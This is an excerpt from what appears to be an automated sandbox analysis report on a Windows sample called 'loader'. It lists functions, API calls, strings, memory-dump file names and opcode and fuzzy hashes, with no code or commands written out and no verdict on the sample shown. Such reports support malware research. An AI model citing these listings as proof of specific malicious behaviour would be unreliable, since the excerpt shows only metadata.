              Function 00110E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: 3a718e3b5e938abb0d48c4eaae82f93edd4a9491bb297c816281fefa70b7ed65
              • Instruction ID: 8100a5ae099a1c42352a063854e2668db32ad41d72d2a070b4c01ab1f5ee007c
              • Opcode Fuzzy Hash: 3a718e3b5e938abb0d48c4eaae82f93edd4a9491bb297c816281fefa70b7ed65
              • Instruction Fuzzy Hash: D351C531A8D701FAEA2E1AE4DD03FF67656EB1CB00F224936B3CA648D5D7D254D06603
              Function 0010772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00107730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001078CC
                • Part of subcall function 0010A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A458
                • Part of subcall function 0010A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A489
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: 42506236270ba8fb6a117546e7e5bbf16db91fcc2942dbaa0ac528b01121d6a2
              • Instruction ID: 3b4c6b55d93bac009a178ede3a58ee748ea7ab11a70840312a43e1ed24697519
              • Opcode Fuzzy Hash: 42506236270ba8fb6a117546e7e5bbf16db91fcc2942dbaa0ac528b01121d6a2
              • Instruction Fuzzy Hash: EE418771C04258AADB25EB50DD59EEEB37CAF55340F0080DAB689A30D2DBB46F85CF61
              Function 0010B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: 2199f5041cc353742d81cf3b49a49dea41d17db3b67db25d405ef1bbde9641a3
              • Instruction ID: 4f9a4841ff8fd465fc596c4ccf550a83aa3e7cb91fb8bf4dcdd21c638de04ea5
              • Opcode Fuzzy Hash: 2199f5041cc353742d81cf3b49a49dea41d17db3b67db25d405ef1bbde9641a3
              • Instruction Fuzzy Hash: 3341C43544421ABACF20AF21DCC2EEF77ADAF54750F114466F8A4A31D2E7F0DA51CA64
              Function 00118FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 3a3554589a19aed192ce910f3bda00688e02082cdae81929fda133b21d27811f
              • Instruction ID: 7d637cee01922ca1258096e83aeee4a4d17060cb87bf3171e4da7f001293a8c8
              • Opcode Fuzzy Hash: 3a3554589a19aed192ce910f3bda00688e02082cdae81929fda133b21d27811f
              • Instruction Fuzzy Hash: 462182716043049FDB0C9F64D8A5AAA77A9FF48711B14C57DF8298F282DB70EC81CB60
              Function 0012F1A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
              Download Yara Rule
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0012F5DF,?,00000000,?,00000000,00000000), ref: 0012F24C
              • GetLastError.KERNEL32(?,0012F5DF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F275
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: ^PpL
              • API String ID: 442123175-914357616
              • Opcode ID: abe65c2a51cdfeb7fbe6afaf7c9276269b4fbfa4824c89f8a4fdd4e088e44a7e
              • Instruction ID: 6b8e82b9385f86c89aa63fd486e4a87b791235c05a9077a699646ef1e505bf1f
              • Opcode Fuzzy Hash: abe65c2a51cdfeb7fbe6afaf7c9276269b4fbfa4824c89f8a4fdd4e088e44a7e
              • Instruction Fuzzy Hash: B1314C75A00219DBCB28CF59DC819DAF3F9FF58310F2445BEE51AD7260E730AA918B54
              Function 0012F0C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
              Download Yara Rule
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0012F5FF,?,00000000,?,00000000,00000000), ref: 0012F15E
              • GetLastError.KERNEL32(?,0012F5FF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F187
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: ^PpL
              • API String ID: 442123175-914357616
              • Opcode ID: ff7474fd012f5836cbf6a2c36180838d0c5a8a6d6ad6b9df137c62a8bceabcc5
              • Instruction ID: cd55a1be6e646423356062b80180d68712e19c9a1b50748cc6469be016f38011
              • Opcode Fuzzy Hash: ff7474fd012f5836cbf6a2c36180838d0c5a8a6d6ad6b9df137c62a8bceabcc5
              • Instruction Fuzzy Hash: 5D216D75A00229DBCB28CF59DD90AE9B3F9EB48311F5044BDE946D7251D730AA92CB60
              Function 0010EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0010EB92
                • Part of subcall function 0010EB73: GetProcAddress.KERNEL32(001481C0,CryptUnprotectMemory), ref: 0010EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,0010EBEC), ref: 0010EC84
              Strings
              • CryptProtectMemory failed, xrefs: 0010EC3B
              • CryptUnprotectMemory failed, xrefs: 0010EC7C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 42bb3a6606c083023131ce36b25199865863b200171b1e519a49caf1c6fba970
              • Instruction ID: 580e28a884b987a14075216a97ed85cb88972f77d27b96b88e1975c66ce34809
              • Opcode Fuzzy Hash: 42bb3a6606c083023131ce36b25199865863b200171b1e519a49caf1c6fba970
              • Instruction Fuzzy Hash: 18115E31A042246FFB199F36DF06A6E3794EF05B24B04441AFC856B2D1CBF69E8197D4
              Function 0011EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0011F25E
              • ___raise_securityfailure.LIBCMT ref: 0011F345
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FeaturePresentProcessor___raise_securityfailure
              • String ID: ^PpL
              • API String ID: 3761405300-914357616
              • Opcode ID: 291ec3c131e3d2946a53b66fe1d6dbf88dabf0885093a286b62cff76b3677337
              • Instruction ID: 980ca535e2d1e36c2466a4d405098ac151844012ca5f2bf465743188d63ed747
              • Opcode Fuzzy Hash: 291ec3c131e3d2946a53b66fe1d6dbf88dabf0885093a286b62cff76b3677337
              • Instruction Fuzzy Hash: C92125B55113249BD716DF54FD826823BE4BB5C310F10592AE9088BBA0E3F269C1CF45
              Function 00110889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNEL32(00000000,00010000,001109D0,?,00000000,00000000), ref: 001108AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 001108F4
                • Part of subcall function 00106E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00106EAF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: f094753e005c6d72345adaad3e10799034b5157e3dcaec8c58b94ae7af1512cb
              • Instruction ID: 5eca70b1d18394008050df58adcedbd9a49558b24baf5fc17c4aacc5097acc61
              • Opcode Fuzzy Hash: f094753e005c6d72345adaad3e10799034b5157e3dcaec8c58b94ae7af1512cb
              • Instruction Fuzzy Hash: 7F0149B17443066FD629AF10EC81FA67398EB48711F20003DFA8A660C1CFF1B8C19664
              Function 0010130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010DA98: _swprintf.LIBCMT ref: 0010DABE
                • Part of subcall function 0010DA98: _strlen.LIBCMT ref: 0010DADF
                • Part of subcall function 0010DA98: SetDlgItemTextW.USER32(?,0013E154,?), ref: 0010DB3F
                • Part of subcall function 0010DA98: GetWindowRect.USER32(?,?), ref: 0010DB79
                • Part of subcall function 0010DA98: GetClientRect.USER32(?,?), ref: 0010DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 0010134F
              • SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: b712eb27ea4c42bc039dea2aa0bd64c74ef91adc7c1cfb0561064063295e8e35
              • Instruction ID: 07afeb84c811681bb6a9aa53204a1b97e7abde2b620c37a96b570a940110e00f
              • Opcode Fuzzy Hash: b712eb27ea4c42bc039dea2aa0bd64c74ef91adc7c1cfb0561064063295e8e35
              • Instruction Fuzzy Hash: F5F08C7010424CB6DF360F618C09BAD3B98BB25365F088414FD896A9E1C7F8C995EA50
              Function 0012A5C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Free
              • String ID: FlsFree$^PpL
              • API String ID: 3978063606-34296952
              • Opcode ID: caf652bdff07f444682c9c6a67cfa83160886aa03f0e63db33468dc958d87d3a
              • Instruction ID: 70a1c47ed53a570a26690cbc7da5b0d495456ba4724be2e808c5790191bb11a7
              • Opcode Fuzzy Hash: caf652bdff07f444682c9c6a67cfa83160886aa03f0e63db33468dc958d87d3a
              • Instruction Fuzzy Hash: BCE0E5F1B45228ABD724AB65AC06DBE7BA0EF24B20F850059FC0557280DF615E50A6DA
              Function 0011084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00110A78,?), ref: 00110854
              • GetLastError.KERNEL32(?), ref: 00110860
                • Part of subcall function 00106E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00106EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00110869
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: 952bb3fc52759c6b12affd798bb386d19dc73cb868fa0d82848d3e0afb235926
              • Instruction ID: 4afdf2c94312899b30c6f0a90278fb12cefd1834452e5221c8c5c1b057d8489c
              • Opcode Fuzzy Hash: 952bb3fc52759c6b12affd798bb386d19dc73cb868fa0d82848d3e0afb235926
              • Instruction Fuzzy Hash: 3CD05E3190852167CA152724EC0ADAFB9059F66730F200725F67D651F5DB610AE182E9
              Function 0010DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,0010D32F,?), ref: 0010DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0010D32F,?), ref: 0010DA61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: 9b8ae0b3af354f5c33883bf068c62edce56e452987882a2d066939ec62871530
              • Instruction ID: 36f9a99f3481aa5b594a2d8b9341bcd4364dd2971c55c6dafb7b8e22bc1f378c
              • Opcode Fuzzy Hash: 9b8ae0b3af354f5c33883bf068c62edce56e452987882a2d066939ec62871530
              • Instruction Fuzzy Hash: ACC01232389350BAEB3427607D0DB832E486B10B22F09048CB291DE5D0DAE9CA8087A4

              Executed Functions

              Function 00007FFD9B9ECD48 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID: [wO
              • API String ID: 0-3450565399
              • Opcode ID: 45fc0ebfb73164635493a6e53dd2bb77836bc4bd7d5ab8925a2ca59f11861f0f
              • Instruction ID: 7ed8727e28cad6d165aa17c04d1867aa6140eaa89d40438394d1917e761d6a11
              • Opcode Fuzzy Hash: 45fc0ebfb73164635493a6e53dd2bb77836bc4bd7d5ab8925a2ca59f11861f0f
              • Instruction Fuzzy Hash: 5CA16A27B1C52B5AE7257BADB4659FD37A0EF80331B060477D59ECD0D3CD2A3A898290
              Function 00007FFD9B9ECD09 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID: [wO
              • API String ID: 0-3450565399
              • Opcode ID: f175b9027ba340caa6ebf4edbc62c882661384076bca44c01a534fec062e628f
              • Instruction ID: ecc9edb66e7065bb077432c7efd8a8028865a69fbbcf9361323a91569a3753e7
              • Opcode Fuzzy Hash: f175b9027ba340caa6ebf4edbc62c882661384076bca44c01a534fec062e628f
              • Instruction Fuzzy Hash: 35A18C27B1C52B4AE71677ACB4615FD7BA0DF81331B0604B7D5DECE0D3CD2A298982A0
              Function 00007FFD9B9E3595 Relevance: .3, Instructions: 301COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8692d1793e90971a187e9763334b6952c762bb2c9b4a4fcd077bf7ac271f7bd7
              • Instruction ID: c3f31568f38b9f141654ec84244ded919f59934f1fd993429b2bf3021a65a67a
              • Opcode Fuzzy Hash: 8692d1793e90971a187e9763334b6952c762bb2c9b4a4fcd077bf7ac271f7bd7
              • Instruction Fuzzy Hash: DBA1C071A1C94E8FEB99EB68C4657E97BE1FF99300F4401BAD00DD72DACBA529418B40
              Function 00007FFD9B9E2CA8 Relevance: .4, Instructions: 388COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f797204137e3bda3611cdd7ca59d70bb40740bd086b59150de8f687e45f0c7f
              • Instruction ID: f2110bad7fd18ea2af22da4670f01cd2abe7fd033cb03f23361ee8519a538828
              • Opcode Fuzzy Hash: 9f797204137e3bda3611cdd7ca59d70bb40740bd086b59150de8f687e45f0c7f
              • Instruction Fuzzy Hash: 07E15F71E2995D9FDBA8EB58C4A47B8B7A2FF58301F0541BED40ED32D6CA346984CB00
              Function 00007FFD9B9E2C38 Relevance: .4, Instructions: 350COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 853b0162409e23d782789e7f031ef3ff18630f14b31684a2698497edf17ca634
              • Instruction ID: 8c18e59cbfb3509c26ae0e3f05c34b206978f7c41110688e777bba167ff5e6f4
              • Opcode Fuzzy Hash: 853b0162409e23d782789e7f031ef3ff18630f14b31684a2698497edf17ca634
              • Instruction Fuzzy Hash: 2AC17131F1995E8EEBA8EB5894A4BF8B7A1FF58301F0540BAD40ED71D6CE356984CB00
              Function 00007FFD9B9EB1B5 Relevance: .4, Instructions: 350COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfb4cff41621ffe8aae57ad0bbeff17800c0c429e1826bdab7f531d005a7f352
              • Instruction ID: c866338a20fb97193fe10098d4f4375935f0fe7802f5949ea5f3d335f007ef4f
